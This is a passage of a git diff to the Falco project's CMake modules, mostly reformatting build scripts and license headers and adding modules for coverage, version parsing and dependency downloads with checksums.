@@ -92,15 +92,10 @@ same as the Catch name; see also ``TEST_PREFIX`` and ``TEST_SUFFIX``.

 #]=======================================================================]

-#------------------------------------------------------------------------------
+# ------------------------------------------------------------------------------
 function(catch_discover_tests TARGET)
-  cmake_parse_arguments(
-    ""
-    ""
-    "TEST_PREFIX;TEST_SUFFIX;WORKING_DIRECTORY;TEST_LIST"
-    "TEST_SPEC;EXTRA_ARGS;PROPERTIES"
-    ${ARGN}
-  )
+  cmake_parse_arguments("" "" "TEST_PREFIX;TEST_SUFFIX;WORKING_DIRECTORY;TEST_LIST" "TEST_SPEC;EXTRA_ARGS;PROPERTIES"
+                        ${ARGN})

  if(NOT _WORKING_DIRECTORY)
    set(_WORKING_DIRECTORY "${CMAKE_CURRENT_BINARY_DIR}")
@@ -109,67 +104,56 @@ function(catch_discover_tests TARGET)
    set(_TEST_LIST ${TARGET}_TESTS)
  endif()

-  ## Generate a unique name based on the extra arguments
+  # Generate a unique name based on the extra arguments
  string(SHA1 args_hash "${_TEST_SPEC} ${_EXTRA_ARGS}")
  string(SUBSTRING ${args_hash} 0 7 args_hash)

  # Define rule to generate test list for aforementioned test executable
  set(ctest_include_file "${CMAKE_CURRENT_BINARY_DIR}/${TARGET}_include-${args_hash}.cmake")
  set(ctest_tests_file "${CMAKE_CURRENT_BINARY_DIR}/${TARGET}_tests-${args_hash}.cmake")
-  get_property(crosscompiling_emulator
+  get_property(
+    crosscompiling_emulator
    TARGET ${TARGET}
-    PROPERTY CROSSCOMPILING_EMULATOR
-  )
+    PROPERTY CROSSCOMPILING_EMULATOR)
  add_custom_command(
-    TARGET ${TARGET} POST_BUILD
+    TARGET ${TARGET}
+    POST_BUILD
    BYPRODUCTS "${ctest_tests_file}"
-    COMMAND "${CMAKE_COMMAND}"
-            -D "TEST_TARGET=${TARGET}"
-            -D "TEST_EXECUTABLE=$<TARGET_FILE:${TARGET}>"
-            -D "TEST_EXECUTOR=${crosscompiling_emulator}"
-            -D "TEST_WORKING_DIR=${_WORKING_DIRECTORY}"
-            -D "TEST_SPEC=${_TEST_SPEC}"
-            -D "TEST_EXTRA_ARGS=${_EXTRA_ARGS}"
-            -D "TEST_PROPERTIES=${_PROPERTIES}"
-            -D "TEST_PREFIX=${_TEST_PREFIX}"
-            -D "TEST_SUFFIX=${_TEST_SUFFIX}"
-            -D "TEST_LIST=${_TEST_LIST}"
-            -D "CTEST_FILE=${ctest_tests_file}"
-            -P "${_CATCH_DISCOVER_TESTS_SCRIPT}"
-    VERBATIM
-  )
+    COMMAND
+      "${CMAKE_COMMAND}" -D "TEST_TARGET=${TARGET}" -D "TEST_EXECUTABLE=$<TARGET_FILE:${TARGET}>" -D
+      "TEST_EXECUTOR=${crosscompiling_emulator}" -D "TEST_WORKING_DIR=${_WORKING_DIRECTORY}" -D
+      "TEST_SPEC=${_TEST_SPEC}" -D "TEST_EXTRA_ARGS=${_EXTRA_ARGS}" -D "TEST_PROPERTIES=${_PROPERTIES}" -D
+      "TEST_PREFIX=${_TEST_PREFIX}" -D "TEST_SUFFIX=${_TEST_SUFFIX}" -D "TEST_LIST=${_TEST_LIST}" -D
+      "CTEST_FILE=${ctest_tests_file}" -P "${_CATCH_DISCOVER_TESTS_SCRIPT}"
+    VERBATIM)

-  file(WRITE "${ctest_include_file}"
-    "if(EXISTS \"${ctest_tests_file}\")\n"
-    "  include(\"${ctest_tests_file}\")\n"
-    "else()\n"
-    "  add_test(${TARGET}_NOT_BUILT-${args_hash} ${TARGET}_NOT_BUILT-${args_hash})\n"
-    "endif()\n"
-  )
+  file(
+    WRITE "${ctest_include_file}"
+    "if(EXISTS \"${ctest_tests_file}\")\n" "  include(\"${ctest_tests_file}\")\n" "else()\n"
+    "  add_test(${TARGET}_NOT_BUILT-${args_hash} ${TARGET}_NOT_BUILT-${args_hash})\n" "endif()\n")

-  if(NOT ${CMAKE_VERSION} VERSION_LESS "3.10.0") 
+  if(NOT ${CMAKE_VERSION} VERSION_LESS "3.10.0")
    # Add discovered tests to directory TEST_INCLUDE_FILES
-    set_property(DIRECTORY
-      APPEND PROPERTY TEST_INCLUDE_FILES "${ctest_include_file}"
-    )
+    set_property(
+      DIRECTORY
+      APPEND
+      PROPERTY TEST_INCLUDE_FILES "${ctest_include_file}")
  else()
    # Add discovered tests as directory TEST_INCLUDE_FILE if possible
-    get_property(test_include_file_set DIRECTORY PROPERTY TEST_INCLUDE_FILE SET)
-    if (NOT ${test_include_file_set})
-      set_property(DIRECTORY
-        PROPERTY TEST_INCLUDE_FILE "${ctest_include_file}"
-      )
+    get_property(
+      test_include_file_set
+      DIRECTORY
+      PROPERTY TEST_INCLUDE_FILE
+      SET)
+    if(NOT ${test_include_file_set})
+      set_property(DIRECTORY PROPERTY TEST_INCLUDE_FILE "${ctest_include_file}")
    else()
-      message(FATAL_ERROR
-        "Cannot set more than one TEST_INCLUDE_FILE"
-      )
+      message(FATAL_ERROR "Cannot set more than one TEST_INCLUDE_FILE")
    endif()
  endif()

 endfunction()

-###############################################################################
+# ######################################################################################################################

-set(_CATCH_DISCOVER_TESTS_SCRIPT
-  ${CMAKE_CURRENT_LIST_DIR}/CatchAddTests.cmake
-)
+set(_CATCH_DISCOVER_TESTS_SCRIPT ${CMAKE_CURRENT_LIST_DIR}/CatchAddTests.cmake)
--- a/cmake/modules/CatchAddTests.cmake
+++ b/cmake/modules/CatchAddTests.cmake
@@ -1,5 +1,5 @@
-# Distributed under the OSI-approved BSD 3-Clause License.  See accompanying
-# file Copyright.txt or https://cmake.org/licensing for details.
+# Distributed under the OSI-approved BSD 3-Clause License.  See accompanying file Copyright.txt or
+# https://cmake.org/licensing for details.

 set(prefix "${TEST_PREFIX}")
 set(suffix "${TEST_SUFFIX}")
@@ -19,31 +19,25 @@ function(add_command NAME)
      set(_args "${_args} ${_arg}")
    endif()
  endforeach()
-  set(script "${script}${NAME}(${_args})\n" PARENT_SCOPE)
+  set(script
+      "${script}${NAME}(${_args})\n"
+      PARENT_SCOPE)
 endfunction()

 # Run test executable to get list of available tests
 if(NOT EXISTS "${TEST_EXECUTABLE}")
-  message(FATAL_ERROR
-    "Specified test executable '${TEST_EXECUTABLE}' does not exist"
-  )
+  message(FATAL_ERROR "Specified test executable '${TEST_EXECUTABLE}' does not exist")
 endif()
 execute_process(
  COMMAND ${TEST_EXECUTOR} "${TEST_EXECUTABLE}" ${spec} --list-test-names-only
  OUTPUT_VARIABLE output
-  RESULT_VARIABLE result
-)
+  RESULT_VARIABLE result)
 # Catch --list-test-names-only reports the number of tests, so 0 is... surprising
 if(${result} EQUAL 0)
-  message(WARNING
-    "Test executable '${TEST_EXECUTABLE}' contains no tests!\n"
-  )
+  message(WARNING "Test executable '${TEST_EXECUTABLE}' contains no tests!\n")
 elseif(${result} LESS 0)
-  message(FATAL_ERROR
-    "Error running test executable '${TEST_EXECUTABLE}':\n"
-    "  Result: ${result}\n"
-    "  Output: ${output}\n"
-  )
+  message(FATAL_ERROR "Error running test executable '${TEST_EXECUTABLE}':\n" "  Result: ${result}\n"
+                      "  Output: ${output}\n")
 endif()

 string(REPLACE "\n" ";" output "${output}")
@@ -54,24 +48,13 @@ foreach(line ${output})
  # use escape commas to handle properly test cases with commans inside the name
  string(REPLACE "," "\\," test_name ${test})
  # ...and add to script
-  add_command(add_test
-    "${prefix}${test}${suffix}"
-    ${TEST_EXECUTOR}
-    "${TEST_EXECUTABLE}"
-    "${test_name}"
-    ${extra_args}
-  )
-  add_command(set_tests_properties
-    "${prefix}${test}${suffix}"
-    PROPERTIES
-    WORKING_DIRECTORY "${TEST_WORKING_DIR}"
-    ${properties}
-  )
+  add_command(add_test "${prefix}${test}${suffix}" ${TEST_EXECUTOR} "${TEST_EXECUTABLE}" "${test_name}" ${extra_args})
+  add_command(set_tests_properties "${prefix}${test}${suffix}" PROPERTIES WORKING_DIRECTORY "${TEST_WORKING_DIR}"
+              ${properties})
  list(APPEND tests "${prefix}${test}${suffix}")
 endforeach()

-# Create a list of all discovered tests, which users may use to e.g. set
-# properties on the tests
+# Create a list of all discovered tests, which users may use to e.g. set properties on the tests
 add_command(set ${TEST_LIST} ${tests})

 # Write CTest script
--- a/cmake/modules/Coverage.cmake
+++ b/cmake/modules/Coverage.cmake
@@ -0,0 +1,25 @@
+#
+# Copyright (C) 2020 The Falco Authors.
+#
+# Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with
+# the License. You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an
+# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the
+# specific language governing permissions and limitations under the License.
+#
+
+# Tests coverage
+option(FALCO_COVERAGE "Build test suite with coverage information" OFF)
+if(FALCO_COVERAGE)
+  if(NOT (("${CMAKE_CXX_COMPILER_ID}" MATCHES "GNU") OR ("${CMAKE_CXX_COMPILER_ID}" MATCHES "Clang")))
+    message(FATAL_ERROR "FALCO_COVERAGE requires GCC or Clang.")
+  endif()
+
+  message(STATUS "Building with coverage information")
+  add_compile_options(-g --coverage)
+  set(CMAKE_SHARED_LINKER_FLAGS "--coverage ${CMAKE_SHARED_LINKER_FLAGS}")
+  set(CMAKE_EXE_LINKER_FLAGS "--coverage ${CMAKE_EXE_LINKER_FLAGS}")
+endif()
--- a/cmake/modules/DownloadCatch.cmake
+++ b/cmake/modules/DownloadCatch.cmake
@@ -1,29 +1,21 @@
 #
-# Copyright (C) 2016-2019 Draios Inc dba Sysdig.
+# Copyright (C) 2020 The Falco Authors.
 #
-# This file is part of falco .
-#
-# Licensed under the Apache License, Version 2.0 (the "License"); you may not
-# use this file except in compliance with the License. You may obtain a copy of
-# the License at
+# Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with
+# the License. You may obtain a copy of the License at
 #
 # http://www.apache.org/licenses/LICENSE-2.0
 #
-# Unless required by applicable law or agreed to in writing, software
-# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
-# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
-# License for the specific language governing permissions and limitations under
-# the License.
+# Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an
+# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the
+# specific language governing permissions and limitations under the License.
 #
 include(ExternalProject)

 set(CATCH2_INCLUDE ${CMAKE_BINARY_DIR}/catch2-prefix/include)

-set(CATCH_EXTERNAL_URL
-    URL
-    https://github.com/catchorg/catch2/archive/v2.9.1.tar.gz
-    URL_HASH
-    MD5=4980778888fed635bf191d8a86f9f89c)
+set(CATCH_EXTERNAL_URL URL https://github.com/catchorg/catch2/archive/v2.12.1.tar.gz URL_HASH
+                       SHA256=e5635c082282ea518a8dd7ee89796c8026af8ea9068cd7402fb1615deacd91c3)

 ExternalProject_Add(
  catch2
@@ -31,9 +23,5 @@ ExternalProject_Add(
  ${CATCH_EXTERNAL_URL}
  CONFIGURE_COMMAND ""
  BUILD_COMMAND ""
-  INSTALL_COMMAND
-    ${CMAKE_COMMAND}
-    -E
-    copy
-    ${CMAKE_BINARY_DIR}/catch2-prefix/src/catch2/single_include/catch2/catch.hpp
-    ${CATCH2_INCLUDE}/catch.hpp)
+  INSTALL_COMMAND ${CMAKE_COMMAND} -E copy ${CMAKE_BINARY_DIR}/catch2-prefix/src/catch2/single_include/catch2/catch.hpp
+                  ${CATCH2_INCLUDE}/catch.hpp)
--- a/cmake/modules/DownloadFakeIt.cmake
+++ b/cmake/modules/DownloadFakeIt.cmake
@@ -1,29 +1,21 @@
 #
-# Copyright (C) 2016-2019 Draios Inc dba Sysdig.
+# Copyright (C) 2020 The Falco Authors.
 #
-# This file is part of falco .
-#
-# Licensed under the Apache License, Version 2.0 (the "License"); you may not
-# use this file except in compliance with the License. You may obtain a copy of
-# the License at
+# Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with
+# the License. You may obtain a copy of the License at
 #
 # http://www.apache.org/licenses/LICENSE-2.0
 #
-# Unless required by applicable law or agreed to in writing, software
-# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
-# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
-# License for the specific language governing permissions and limitations under
-# the License.
+# Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an
+# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the
+# specific language governing permissions and limitations under the License.
 #
 include(ExternalProject)

 set(FAKEIT_INCLUDE ${CMAKE_BINARY_DIR}/fakeit-prefix/include)

-set(FAKEIT_EXTERNAL_URL
-    URL
-    https://github.com/eranpeer/fakeit/archive/2.0.5.tar.gz
-    URL_HASH
-    MD5=d3d21b909cebaea5b780af5500bf384e)
+set(FAKEIT_EXTERNAL_URL URL https://github.com/eranpeer/fakeit/archive/2.0.5.tar.gz URL_HASH
+                        SHA256=298539c773baca6ecbc28914306bba19d1008e098f8adc3ad3bb00e993ecdf15)

 ExternalProject_Add(
  fakeit-external
@@ -32,8 +24,5 @@ ExternalProject_Add(
  CONFIGURE_COMMAND ""
  BUILD_COMMAND ""
  INSTALL_COMMAND
-    ${CMAKE_COMMAND}
-    -E
-    copy
-    ${CMAKE_BINARY_DIR}/fakeit-prefix/src/fakeit-external/single_header/catch/fakeit.hpp
+    ${CMAKE_COMMAND} -E copy ${CMAKE_BINARY_DIR}/fakeit-prefix/src/fakeit-external/single_header/catch/fakeit.hpp
    ${FAKEIT_INCLUDE}/fakeit.hpp)
--- a/cmake/modules/DownloadStringViewLite.cmake
+++ b/cmake/modules/DownloadStringViewLite.cmake
@@ -0,0 +1,29 @@
+#
+# Copyright (C) 2020 The Falco Authors.
+#
+# Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with
+# the License. You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an
+# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the
+# specific language governing permissions and limitations under the License.
+#
+
+include(ExternalProject)
+
+set(STRING_VIEW_LITE_PREFIX ${CMAKE_BINARY_DIR}/string-view-lite-prefix)
+set(STRING_VIEW_LITE_INCLUDE ${STRING_VIEW_LITE_PREFIX}/include)
+message(STATUS "Found string-view-lite: include: ${STRING_VIEW_LITE_INCLUDE}")
+
+ExternalProject_Add(
+  string-view-lite
+  PREFIX ${STRING_VIEW_LITE_PREFIX}
+  GIT_REPOSITORY "https://github.com/martinmoene/string-view-lite.git"
+  GIT_TAG "v1.4.0"
+  CONFIGURE_COMMAND ""
+  BUILD_COMMAND ""
+  INSTALL_COMMAND
+    ${CMAKE_COMMAND} -E copy ${STRING_VIEW_LITE_PREFIX}/src/string-view-lite/include/nonstd/string_view.hpp
+    ${STRING_VIEW_LITE_INCLUDE}/nonstd/string_view.hpp)
--- a/cmake/modules/FindMakedev.cmake
+++ b/cmake/modules/FindMakedev.cmake
@@ -0,0 +1,31 @@
+#
+# Copyright (C) 2020 The Falco Authors.
+#
+# Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with
+# the License. You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an
+# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the
+# specific language governing permissions and limitations under the License.
+#
+
+# This module is used to understand where the makedev function is defined in the glibc in use. see 'man 3 makedev'
+# Usage: In your CMakeLists.txt include(FindMakedev)
+#
+# In your source code:
+#
+# #if HAVE_SYS_MKDEV_H #include <sys/mkdev.h> #endif #ifdef HAVE_SYS_SYSMACROS_H #include <sys/sysmacros.h> #endif
+#
+include(${CMAKE_ROOT}/Modules/CheckIncludeFile.cmake)
+
+check_include_file("sys/mkdev.h" HAVE_SYS_MKDEV_H)
+check_include_file("sys/sysmacros.h" HAVE_SYS_SYSMACROS_H)
+
+if(HAVE_SYS_MKDEV_H)
+  add_definitions(-DHAVE_SYS_MKDEV_H)
+endif()
+if(HAVE_SYS_SYSMACROS_H)
+  add_definitions(-DHAVE_SYS_SYSMACROS_H)
+endif()
--- a/cmake/modules/GetFalcoVersion.cmake
+++ b/cmake/modules/GetFalcoVersion.cmake
@@ -0,0 +1,59 @@
+#
+# Copyright (C) 2020 The Falco Authors.
+#
+# Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with
+# the License. You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an
+# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the
+# specific language governing permissions and limitations under the License.
+#
+
+# Retrieve git ref and commit hash
+include(GetGitRevisionDescription)
+
+# Create the falco version variable according to git index
+if(NOT FALCO_VERSION)
+  string(STRIP "${FALCO_HASH}" FALCO_HASH)
+  # Try to obtain the exact git tag
+  git_get_exact_tag(FALCO_TAG)
+  if(NOT FALCO_TAG)
+    # Obtain the closest tag
+    git_describe(FALCO_VERSION "--always" "--tags")
+    # Fallback version
+    if(FALCO_VERSION MATCHES "NOTFOUND$")
+      set(FALCO_VERSION "0.0.0")
+    endif()
+    # Format FALCO_VERSION to be semver with prerelease and build part
+    string(REPLACE "-g" "+" FALCO_VERSION "${FALCO_VERSION}")
+  else()
+    # A tag has been found: use it as the Falco version
+    set(FALCO_VERSION "${FALCO_TAG}")
+    # Remove the starting "v" in case there is one
+    string(REGEX REPLACE "^v(.*)" "\\1" FALCO_VERSION "${FALCO_TAG}")
+  endif()
+  # TODO(leodido) > ensure Falco version is semver before extracting parts Populate partial version variables
+  string(REGEX MATCH "^(0|[1-9][0-9]*)" FALCO_VERSION_MAJOR "${FALCO_VERSION}")
+  string(REGEX REPLACE "^(0|[1-9][0-9]*)\\.(0|[1-9][0-9]*)\\..*" "\\2" FALCO_VERSION_MINOR "${FALCO_VERSION}")
+  string(REGEX REPLACE "^(0|[1-9][0-9]*)\\.(0|[1-9][0-9]*)\\.(0|[1-9][0-9]*).*" "\\3" FALCO_VERSION_PATCH
+                       "${FALCO_VERSION}")
+  string(
+    REGEX
+    REPLACE
+      "^(0|[1-9][0-9]*)\\.(0|[1-9][0-9]*)\\.(0|[1-9][0-9]*)-((0|[1-9][0-9]*|[0-9]*[a-zA-Z-][0-9a-zA-Z-]*)(\\.(0|[1-9][0-9]*|[0-9]*[a-zA-Z-][0-9a-zA-Z-]*))*).*"
+      "\\5"
+      FALCO_VERSION_PRERELEASE
+      "${FALCO_VERSION}")
+  if(FALCO_VERSION_PRERELEASE STREQUAL "${FALCO_VERSION}")
+    set(FALCO_VERSION_PRERELEASE "")
+  endif()
+  if(NOT FALCO_VERSION_BUILD)
+    string(REGEX REPLACE ".*\\+([0-9a-zA-Z-]+(\\.[0-9a-zA-Z-]+)*)" "\\1" FALCO_VERSION_BUILD "${FALCO_VERSION}")
+  endif()
+  if(FALCO_VERSION_BUILD STREQUAL "${FALCO_VERSION}")
+    set(FALCO_VERSION_BUILD "")
+  endif()
+endif()
+message(STATUS "Falco version: ${FALCO_VERSION}")
--- a/cmake/modules/GetGitRevisionDescription.cmake
+++ b/cmake/modules/GetGitRevisionDescription.cmake
@@ -1,168 +1,169 @@
-# - Returns a version string from Git
+# * Returns a version string from Git
 #
-# These functions force a re-configure on each git commit so that you can
-# trust the values of the variables in your build system.
+# These functions force a re-configure on each git commit so that you can trust the values of the variables in your
+# build system.
 #
-#  get_git_head_revision(<refspecvar> <hashvar> [<additional arguments to git describe> ...])
+# get_git_head_revision(<refspecvar> <hashvar> [<additional arguments to git describe> ...])
 #
 # Returns the refspec and sha hash of the current head revision
 #
-#  git_describe(<var> [<additional arguments to git describe> ...])
+# git_describe(<var> [<additional arguments to git describe> ...])
 #
-# Returns the results of git describe on the source tree, and adjusting
-# the output so that it tests false if an error occurs.
+# Returns the results of git describe on the source tree, and adjusting the output so that it tests false if an error
+# occurs.
 #
-#  git_get_exact_tag(<var> [<additional arguments to git describe> ...])
+# git_get_exact_tag(<var> [<additional arguments to git describe> ...])
 #
-# Returns the results of git describe --exact-match on the source tree,
-# and adjusting the output so that it tests false if there was no exact
-# matching tag.
+# Returns the results of git describe --exact-match on the source tree, and adjusting the output so that it tests false
+# if there was no exact matching tag.
 #
-#  git_local_changes(<var>)
+# git_local_changes(<var>)
 #
-# Returns either "CLEAN" or "DIRTY" with respect to uncommitted changes.
-# Uses the return code of "git diff-index --quiet HEAD --".
-# Does not regard untracked files.
+# Returns either "CLEAN" or "DIRTY" with respect to uncommitted changes. Uses the return code of "git diff-index --quiet
+# HEAD --". Does not regard untracked files.
 #
 # Requires CMake 2.6 or newer (uses the 'function' command)
 #
-# Original Author:
-# 2009-2010 Ryan Pavlik <rpavlik@iastate.edu> <abiryan@ryand.net>
-# http://academic.cleardefinition.com
+# Original Author: 2009-2010 Ryan Pavlik <rpavlik@iastate.edu> <abiryan@ryand.net> http://academic.cleardefinition.com
 # Iowa State University HCI Graduate Program/VRAC
 #
-# Copyright Iowa State University 2009-2010.
-# Distributed under the Boost Software License, Version 1.0.
-# (See accompanying file LICENSE_1_0.txt or copy at
-# http://www.boost.org/LICENSE_1_0.txt)
+# Copyright Iowa State University 2009-2010. Distributed under the Boost Software License, Version 1.0. (See
+# accompanying file LICENSE_1_0.txt or copy at http://www.boost.org/LICENSE_1_0.txt)

 if(__get_git_revision_description)
-	return()
+  return()
 endif()
 set(__get_git_revision_description YES)

-# We must run the following at "include" time, not at function call time,
-# to find the path to this module rather than the path to a calling list file
+# We must run the following at "include" time, not at function call time, to find the path to this module rather than
+# the path to a calling list file
 get_filename_component(_gitdescmoddir ${CMAKE_CURRENT_LIST_FILE} PATH)

 function(get_git_head_revision _refspecvar _hashvar)
-	set(GIT_PARENT_DIR "${CMAKE_CURRENT_SOURCE_DIR}")
-	set(GIT_DIR "${GIT_PARENT_DIR}/.git")
-	while(NOT EXISTS "${GIT_DIR}")	# .git dir not found, search parent directories
-		set(GIT_PREVIOUS_PARENT "${GIT_PARENT_DIR}")
-		get_filename_component(GIT_PARENT_DIR ${GIT_PARENT_DIR} PATH)
-		if(GIT_PARENT_DIR STREQUAL GIT_PREVIOUS_PARENT)
-			# We have reached the root directory, we are not in git
-			set(${_refspecvar} "GITDIR-NOTFOUND" PARENT_SCOPE)
-			set(${_hashvar} "GITDIR-NOTFOUND" PARENT_SCOPE)
-			return()
-		endif()
-		set(GIT_DIR "${GIT_PARENT_DIR}/.git")
-	endwhile()
-	# check if this is a submodule
-	if(NOT IS_DIRECTORY ${GIT_DIR})
-		file(READ ${GIT_DIR} submodule)
-		string(REGEX REPLACE "gitdir: (.*)\n$" "\\1" GIT_DIR_RELATIVE ${submodule})
-		get_filename_component(SUBMODULE_DIR ${GIT_DIR} PATH)
-		get_filename_component(GIT_DIR ${SUBMODULE_DIR}/${GIT_DIR_RELATIVE} ABSOLUTE)
-	endif()
-	set(GIT_DATA "${CMAKE_CURRENT_BINARY_DIR}/CMakeFiles/git-data")
-	if(NOT EXISTS "${GIT_DATA}")
-		file(MAKE_DIRECTORY "${GIT_DATA}")
-	endif()
+  set(GIT_PARENT_DIR "${CMAKE_CURRENT_SOURCE_DIR}")
+  set(GIT_DIR "${GIT_PARENT_DIR}/.git")
+  while(NOT EXISTS "${GIT_DIR}") # .git dir not found, search parent directories
+    set(GIT_PREVIOUS_PARENT "${GIT_PARENT_DIR}")
+    get_filename_component(GIT_PARENT_DIR ${GIT_PARENT_DIR} PATH)
+    if(GIT_PARENT_DIR STREQUAL GIT_PREVIOUS_PARENT)
+      # We have reached the root directory, we are not in git
+      set(${_refspecvar}
+          "GITDIR-NOTFOUND"
+          PARENT_SCOPE)
+      set(${_hashvar}
+          "GITDIR-NOTFOUND"
+          PARENT_SCOPE)
+      return()
+    endif()
+    set(GIT_DIR "${GIT_PARENT_DIR}/.git")
+  endwhile()
+  # check if this is a submodule
+  if(NOT IS_DIRECTORY ${GIT_DIR})
+    file(READ ${GIT_DIR} submodule)
+    string(REGEX REPLACE "gitdir: (.*)\n$" "\\1" GIT_DIR_RELATIVE ${submodule})
+    get_filename_component(SUBMODULE_DIR ${GIT_DIR} PATH)
+    get_filename_component(GIT_DIR ${SUBMODULE_DIR}/${GIT_DIR_RELATIVE} ABSOLUTE)
+  endif()
+  set(GIT_DATA "${CMAKE_CURRENT_BINARY_DIR}/CMakeFiles/git-data")
+  if(NOT EXISTS "${GIT_DATA}")
+    file(MAKE_DIRECTORY "${GIT_DATA}")
+  endif()

-	if(NOT EXISTS "${GIT_DIR}/HEAD")
-		return()
-	endif()
-	set(HEAD_FILE "${GIT_DATA}/HEAD")
-	configure_file("${GIT_DIR}/HEAD" "${HEAD_FILE}" COPYONLY)
+  if(NOT EXISTS "${GIT_DIR}/HEAD")
+    return()
+  endif()
+  set(HEAD_FILE "${GIT_DATA}/HEAD")
+  configure_file("${GIT_DIR}/HEAD" "${HEAD_FILE}" COPYONLY)

-	configure_file("${_gitdescmoddir}/GetGitRevisionDescription.cmake.in"
-		"${GIT_DATA}/grabRef.cmake"
-		@ONLY)
-	include("${GIT_DATA}/grabRef.cmake")
+  configure_file("${_gitdescmoddir}/GetGitRevisionDescription.cmake.in" "${GIT_DATA}/grabRef.cmake" @ONLY)
+  include("${GIT_DATA}/grabRef.cmake")

-	set(${_refspecvar} "${HEAD_REF}" PARENT_SCOPE)
-	set(${_hashvar} "${HEAD_HASH}" PARENT_SCOPE)
+  set(${_refspecvar}
+      "${HEAD_REF}"
+      PARENT_SCOPE)
+  set(${_hashvar}
+      "${HEAD_HASH}"
+      PARENT_SCOPE)
 endfunction()

 function(git_describe _var)
-	if(NOT GIT_FOUND)
-		find_package(Git QUIET)
-	endif()
-	get_git_head_revision(refspec hash)
-	if(NOT GIT_FOUND)
-		set(${_var} "GIT-NOTFOUND" PARENT_SCOPE)
-		return()
-	endif()
-	if(NOT hash)
-		set(${_var} "HEAD-HASH-NOTFOUND" PARENT_SCOPE)
-		return()
-	endif()
+  if(NOT GIT_FOUND)
+    find_package(Git QUIET)
+  endif()
+  get_git_head_revision(refspec hash)
+  if(NOT GIT_FOUND)
+    set(${_var}
+        "GIT-NOTFOUND"
+        PARENT_SCOPE)
+    return()
+  endif()
+  if(NOT hash)
+    set(${_var}
+        "HEAD-HASH-NOTFOUND"
+        PARENT_SCOPE)
+    return()
+  endif()

-	# TODO sanitize
-	#if((${ARGN}" MATCHES "&&") OR
-	#	(ARGN MATCHES "||") OR
-	#	(ARGN MATCHES "\\;"))
-	#	message("Please report the following error to the project!")
-	#	message(FATAL_ERROR "Looks like someone's doing something nefarious with git_describe! Passed arguments ${ARGN}")
-	#endif()
+  execute_process(COMMAND
+    "${GIT_EXECUTABLE}"
+    describe
+    ${hash}
+    ${ARGN}
+    WORKING_DIRECTORY
+    "${CMAKE_CURRENT_SOURCE_DIR}"
+    RESULT_VARIABLE
+    res
+    OUTPUT_VARIABLE
+    out
+    ERROR_QUIET
+    OUTPUT_STRIP_TRAILING_WHITESPACE)
+  if(NOT res EQUAL 0)
+    set(out "${out}-${res}-NOTFOUND")
+  endif()

-	# message(STATUS "Arguments to execute_process: ${ARGN}")
-
-	execute_process(COMMAND
-		"${GIT_EXECUTABLE}"
-		describe
-		${hash}
-		${ARGN}
-		WORKING_DIRECTORY
-		"${CMAKE_CURRENT_SOURCE_DIR}"
-		RESULT_VARIABLE
-		res
-		OUTPUT_VARIABLE
-		out
-		ERROR_QUIET
-		OUTPUT_STRIP_TRAILING_WHITESPACE)
-	if(NOT res EQUAL 0)
-		set(out "${out}-${res}-NOTFOUND")
-	endif()
-
-	set(${_var} "${out}" PARENT_SCOPE)
+  set(${_var}
+      "${out}"
+      PARENT_SCOPE)
 endfunction()

 function(git_get_exact_tag _var)
-	git_describe(out --exact-match ${ARGN})
-	set(${_var} "${out}" PARENT_SCOPE)
+  git_describe(out --exact-match ${ARGN})
+  set(${_var}
+      "${out}"
+      PARENT_SCOPE)
 endfunction()

 function(git_local_changes _var)
-	if(NOT GIT_FOUND)
-		find_package(Git QUIET)
-	endif()
-	get_git_head_revision(refspec hash)
-	if(NOT GIT_FOUND)
-		set(${_var} "GIT-NOTFOUND" PARENT_SCOPE)
-		return()
-	endif()
-	if(NOT hash)
-		set(${_var} "HEAD-HASH-NOTFOUND" PARENT_SCOPE)
-		return()
-	endif()
+  if(NOT GIT_FOUND)
+    find_package(Git QUIET)
+  endif()
+  get_git_head_revision(refspec hash)
+  if(NOT GIT_FOUND)
+    set(${_var}
+        "GIT-NOTFOUND"
+        PARENT_SCOPE)
+    return()
+  endif()
+  if(NOT hash)
+    set(${_var}
+        "HEAD-HASH-NOTFOUND"
+        PARENT_SCOPE)
+    return()
+  endif()

-	execute_process(COMMAND
-		"${GIT_EXECUTABLE}"
-		diff-index --quiet HEAD --
-		WORKING_DIRECTORY
-		"${CMAKE_CURRENT_SOURCE_DIR}"
-		RESULT_VARIABLE
-		res
-		OUTPUT_VARIABLE
-		out
-		ERROR_QUIET
-		OUTPUT_STRIP_TRAILING_WHITESPACE)
-	if(res EQUAL 0)
-		set(${_var} "CLEAN" PARENT_SCOPE)
-	else()
-		set(${_var} "DIRTY" PARENT_SCOPE)
-	endif()
-endfunction()
+  execute_process(
+    COMMAND "${GIT_EXECUTABLE}" diff-index --quiet HEAD --
+    WORKING_DIRECTORY "${CMAKE_CURRENT_SOURCE_DIR}"
+    RESULT_VARIABLE res
